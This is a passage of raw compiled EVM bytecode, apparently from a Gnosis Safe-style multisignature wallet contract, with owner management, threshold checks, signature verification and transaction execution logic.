38110156107bf5780820151818401526020810190506107a4565b50505050905090810190601f1680156107ec5780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b34801561080757600080fd5b5061083e6004803603604081101561081e57600080fd5b81019080803590602001909291908035906020019092919050505061280d565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561087e578082015181840152602081019050610863565b50505050905090810190601f1680156108ab5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156108c557600080fd5b506108f2600480360360208110156108dc57600080fd5b8101908080359060200190929190505050612894565b6040518082815260200191505060405180910390f35b34801561091457600080fd5b506109576004803603602081101561092b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506128ac565b005b34801561096557600080fd5b506109926004803603602081101561097c57600080fd5b8101908080359060200190929190505050612c3e565b005b610b3860048036036101408110156109ab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156109f257600080fd5b820183602082011115610a0457600080fd5b80359060200191846001830284011164010000000083111715610a2657600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610ab257600080fd5b820183602082011115610ac457600080fd5b80359060200191846001830284011164010000000083111715610ae657600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050612d78565b60405180821515815260200191505060405180910390f35b348015610b5c57600080fd5b50610ba960048036036040811015610b7357600080fd5b81019080803573fffffffffffffffffffffffffffffffffffff
fff169060200190929190803590602001909291905050506132b5565b6040518082815260200191505060405180910390f35b348015610bcb57600080fd5b50610d2660048036036060811015610be257600080fd5b810190808035906020019092919080359060200190640100000000811115610c0957600080fd5b820183602082011115610c1b57600080fd5b80359060200191846001830284011164010000000083111715610c3d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190640100000000811115610ca057600080fd5b820183602082011115610cb257600080fd5b80359060200191846001830284011164010000000083111715610cd457600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f8201169050808301925050505050505091929192905050506132da565b005b348015610d3457600080fd5b50610d3d613369565b6040518080602001828103825283818151815260200191508051906020019060200280838360005b83811015610d80578082015181840152602081019050610d65565b505050509050019250505060405180910390f35b348015610da057600080fd5b50610da9613512565b6040518082815260200191505060405180910390f35b348015610dcb57600080fd5b50610ea560048036036040811015610de257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610e1f57600080fd5b820183602082011115610e3157600080fd5b80359060200191846001830284011164010000000083111715610e5357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050613518565b005b348015610eb357600080fd5b506110156004803603610100811015610ecb57600080fd5b8101908080359060200190640100000000811115610ee857600080fd5b820183602082011115610efa57600080fd5b80359060200191846020830284011164010000000083111715610f1c57600080fd5b909192939192939080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610f6757600080fd5b820183602082011115610f79576
00080fd5b80359060200191846001830284011164010000000083111715610f9b57600080fd5b9091929391929390803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061353a565b005b34801561102357600080fd5b506110d26004803603608081101561103a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561108157600080fd5b82018360208201111561109357600080fd5b803590602001918460018302840111640100000000831117156110b557600080fd5b9091929391929390803560ff1690602001909291905050506136f8565b6040518082815260200191505060405180910390f35b3480156110f457600080fd5b506111416004803603604081101561110b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613820565b60405180806020018373ffffffffffffffffffffffffffffffffffffffff168152602001828103825284818151815260200191508051906020019060200280838360005b838110156111a0578082015181840152602081019050611185565b50505050905001935050505060405180910390f35b3480156111c157600080fd5b506111ee600480360360208110156111d857600080fd5b8101908080359060200190929190505050613a12565b005b3480156111fc57600080fd5b50611314600480360361014081101561121457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561125b57600080fd5b82018360208201111561126d57600080fd5b8035906020019184600183028401116401000000008311171561128f57600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613bb1565b6040518082815260200191505060405180910390f35b34801561133657600080fd5b506113996004803603604081101561134d57600080fd5b81019080803573fffffffffffffffff
fffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613bde565b005b3480156113a757600080fd5b506113ea600480360360208110156113be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613f6f565b005b3480156113f857600080fd5b5061147b6004803603606081101561140f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613ff3565b005b34801561148957600080fd5b50611492614665565b6040518082815260200191505060405180910390f35b3480156114b457600080fd5b506115cc60048036036101408110156114cc57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561151357600080fd5b82018360208201111561152557600080fd5b8035906020019184600183028401116401000000008311171561154757600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061466f565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561160c5780820151818401526020810190506115f1565b50505050905090810190601f1680156116395780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561165357600080fd5b506116966004803603602081101561166a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050614817565b005b3480156116a457600080fd5b506116ad614878565b6040518082815260200191505060405180910390f35b3480156116cf57600080fd5b5061173c600480360360608110156116e657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506148f6565b005b34801561174a5
7600080fd5b50611753614d29565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015611793578082015181840152602081019050611778565b50505050905090810190601f1680156117c05780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6117d6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156118405750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561187857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6118ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146119eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908
373ffffffffffffffffffffffffffffffffffffffff1602179055506003600081548092919060010191905055507f9465fa0c962cc76958e6373a993326400c1c94f8be2fe3a952adfa7f60b2ea2682604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414611bba57611bb981612c3e565b5b5050565b611bd2604182614e0590919063ffffffff16565b82511015611c48576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6000808060008060005b8681101561243457611c648882614e3f565b80945081955082965050505060008460ff16141561206d578260001c9450611c96604188614e0590919063ffffffff16565b8260001c1015611d0e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8751611d2760208460001c614e6e90919063ffffffff16565b1115611d9b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006020838a01015190508851611dd182611dc360208760001c614e6e90919063ffffffff16565b614e6e90919063ffffffff16565b1115611e45576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60606020848b010190506320c13b0b60e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168773ffffffffffffffffffffffffffffffffffffffff166320c13b0b8d846040518363ffffffff1660e01b8152600401808060200180602001838103835285818151815260200191508051906020019080838360005b83811015611ee7578082015181840152602081019050611ecc565b50505050905090810190601f168015611f145780820380516001836020036101000a031916815260200191505b5
0838103825284818151815260200191508051906020019080838360005b83811015611f4d578082015181840152602081019050611f32565b50505050905090810190601f168015611f7a5780820380516001836020036101000a031916815260200191505b5094505050505060206040518083038186803b158015611f9957600080fd5b505afa158015611fad573d6000803e3d6000fd5b505050506040513d6020811015611fc357600080fd5b81019080805190602001909291905050507bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614612066576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b50506122b2565b60018460ff161415612181578260001c94508473ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061210a57506000600860008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008c81526020019081526020016000205414155b61217c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6122b1565b601e8460ff1611156122495760018a60405160200180807f19457468657265756d205369676e6564204d6573736167653a0a333200000000815250601c018281526020019150506040516020818303038152906040528051906020012060048603858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa158015612238573d6000803e3d6000fd5b5050506020604051035194506122b0565b60018a85858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa1580156122a3573d6000803e3d6000fd5b5050506020604051035194505b5b5b8573ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161180156123795750600073fffffffffffffffffffffffffffffffffff
fffff16600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b80156123b25750600173ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b612424576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323600000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8495508080600101915050611c52565b50505050505050505050565b60008173ffffffffffffffffffffffffffffffffffffffff16600173ffffffffffffffffffffffffffffffffffffffff161415801561250b5750600073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156125dd5750600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000804690508091505090565b6000600173ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141580156126bc5750600073ffffffffffffffffffffffffffffffffffffffff16600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b61272e576040517f08c379a0000000000000000000000000000000000000000000000000000000008
1526004018080602001828103825260058152602001807f475331303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b61273b858585855a614e8d565b9050801561278b573373ffffffffffffffffffffffffffffffffffffffff167f6895c13664aa4f67288b25d7a21d7aaa34916e355fb9b6fae0a139a9085becb860405160405180910390a26127cf565b3373ffffffffffffffffffffffffffffffffffffffff167facd2c8702804128fdb0db2bb49f6d127dd0181c13fd45dbfe16de0930e2bd37560405160405180910390a25b949350505050565b600060606127e7868686866125f1565b915060405160203d0181016040523d81523d6000602083013e8091505094509492505050565b606060006020830267ffffffffffffffff8111801561282b57600080fd5b506040519080825280601f01601f19166020018201604052801561285e5781602001600182028036833780820191505090505b50905060005b8381101561288957808501548060208302602085010152508080600101915050612864565b508091505092915050565b60076020528060005260406000206000915090505481565b6128b4614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561291e5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b612990576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612a91576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602
00160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fecdf3a3effea5783a3c4c2140e677577666428d44ed9d474a0b3a4c9943f844081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b612c46614d62565b600354811115612cbe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001811015612d35576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b806004819055507f610f7ff2b304ae8903c3de74c60c6ab1f7d6226b3f52c5161905bb5ad4039c936004546040518082815260200191505060405180910390a150565b6000806000612d928e8e8e8e8e8e8e8e8e8e60055461466f565b905060056000815480929190600101919050555080805190602001209150612dbb8282866132da565b506000612dc6614ed9565b9050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614612fac578073ffffffffffffffffffffffffffffffffffffffff166375f0bb528f8f8f8f8f8f8f8f8f8f8f336040518d63ffffffff1660e01b8152600401808d73ffffffffffffffffffffffffffffffffffffffff1681526020018c8152602001806020018a6001811115612e6957fe5b81526020018981526020018881526020018781526020018673ffffffffffffffffffffffffffffffffffffffff1681526020018573ffffffffffffffffffffffffffffffffffffffff16815
2602001806020018473ffffffffffffffffffffffffffffffffffffffff16815260200183810383528d8d82818152602001925080828437600081840152601f19601f820116905080830192505050838103825285818151815260200191508051906020019080838360005b83811015612f3b578082015181840152602081019050612f20565b50505050905090810190601f168015612f685780820380516001836020036101000a031916815260200191505b509e505050505050505050505050505050600060405180830381600087803b158015612f9357600080fd5b505af1158015612fa7573d6000803e3d6000fd5b505050505b6101f4612fd36109c48b01603f60408d0281612fc457fe5b04614f0a90919063ffffffff16565b015a1015613049576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60005a90506130b28f8f8f8f8080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050508e60008d146130a7578e6130ad565b6109c45a035b614e8d565b93506130c75a82614f2490919063ffffffff16565b905083806130d6575060008a14155b806130e2575060008814155b613154576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60008089111561316e5761316b828b8b8b8b614f44565b90505b84156131b8577f442e715f626346e8c54381002da614f62bee8d27386535b2521ec8540898556e8482604051808381526020018281526020019250505060405180910390a16131f8565b7f23428b18acfb3ea64b08dc0c1d296ea9c09702c09083ca5272e64d115b687d238482604051808381526020018281526020019250505060405180910390a15b5050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146132a4578073ffffffffffffffffffffffffffffffffffffffff16639327136883856040518363ffffffff1660e01b815260040180838152602001821515815260200192505050600060405180830381600087803b15801561328b57600080fd5b505af115801561329f573d6000803e3d600
0fd5b505050505b50509b9a5050505050505050505050565b6008602052816000526040600020602052806000526040600020600091509150505481565b6000600454905060008111613357576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b61336384848484611bbe565b50505050565b6060600060035467ffffffffffffffff8111801561338657600080fd5b506040519080825280602002602001820160405280156133b55781602001602082028036833780820191505090505b50905060008060026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614613509578083838151811061346057fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600260008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050818060010192505061341f565b82935050505090565b60055481565b600080825160208401855af4806000523d6020523d600060403e60403d016000fd5b6135858a8a80806020026020016040519081016040528093929190818152602001838360200280828437600081840152601f19601f820116905080830192505050505050508961514a565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146135c3576135c28461564a565b5b6136118787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050615679565b600082111561362b5761362982600060018685614f44565b505b3373ffffffffffffffffffffffffffffffffffffffff167f141df868a6331af528e38c83b7aa03edc19be66e37ae67f9285bf4f8e3c6a1a88b8b8b8b8960405180806020018581526020018473fffffffffffffffffffffffff
fffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff1681526020018281038252878782818152602001925060200280828437600081840152601f19601f820116905080830192505050965050505050505060405180910390a250505050505050505050565b6000805a905061374f878787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050865a614e8d565b61375857600080fd5b60005a8203905080604051602001808281526020019150506040516020818303038152906040526040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156137e55780820151818401526020810190506137ca565b50505050905090810190601f1680156138125780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b606060008267ffffffffffffffff8111801561383b57600080fd5b5060405190808252806020026020018201604052801561386a5781602001602082028036833780820191505090505b509150600080600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561393d5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561394857508482105b15613a03578084838151811061395a57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081806001019250506138d3565b80925081845250509250929050565b600073ffffffffffffffffffffffffffffffffffffffff16600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000905
4906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415613b14576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330333000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001600860003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000838152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16817ff2a0eb156472d1440255b0d7c1e19cc07115d1051fe605b0dce69acfec884d9c60405160405180910390a350565b6000613bc68c8c8c8c8c8c8c8c8c8c8c61466f565b8051906020012090509b9a5050505050505050505050565b613be6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614158015613c505750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b613cc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613dc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815
260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507faab4fa2b463f581b2b32cb3b7e3b704b9ce37cc209b5fb4d77e593ace405427681604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613f77614d62565b60007f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b90508181557f1151116914515bc0891ff9047a6cb32cf902546f83066499bcf8ba33d2353fa282604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613ffb614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156140655750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561409d57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b61410f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614210576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273fffffffffffffffffffffffffffffffffffff
fff161415801561427a5750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6142ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146143ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a17f9465fa0c962cc76958e6373a993326400
c1c94f8be2fe3a952adfa7f60b2ea2681604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a1505050565b6000600454905090565b606060007fbb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d860001b8d8d8d8d60405180838380828437808301925050509250505060405180910390208c8c8c8c8c8c8c604051602001808c81526020018b73ffffffffffffffffffffffffffffffffffffffff1681526020018a815260200189815260200188600181111561470057fe5b81526020018781526020018681526020018581526020018473ffffffffffffffffffffffffffffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019b505050505050505050505050604051602081830303815290604052805190602001209050601960f81b600160f81b61478c614878565b8360405160200180857effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168152600101847effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191681526001018381526020018281526020019450505050506040516020818303038152906040529150509b9a5050505050505050505050565b61481f614d62565b6148288161564a565b7f5ac6c46c93c8d0e53714ba3b53db3e7c046da994313d7ed0d192028bc7c228b081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b60007f47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a7946921860001b6148a66125e4565b30604051602001808481526020018381526020018273ffffffffffffffffffffffffffffffffffffffff168152602001935050505060405160208183030381529060405280519060200120905090565b6148fe614d62565b806001600354031015614979576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156149e35750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b614a55576040517f08c379a000000000000000000000000000000000000000000000000000000000815
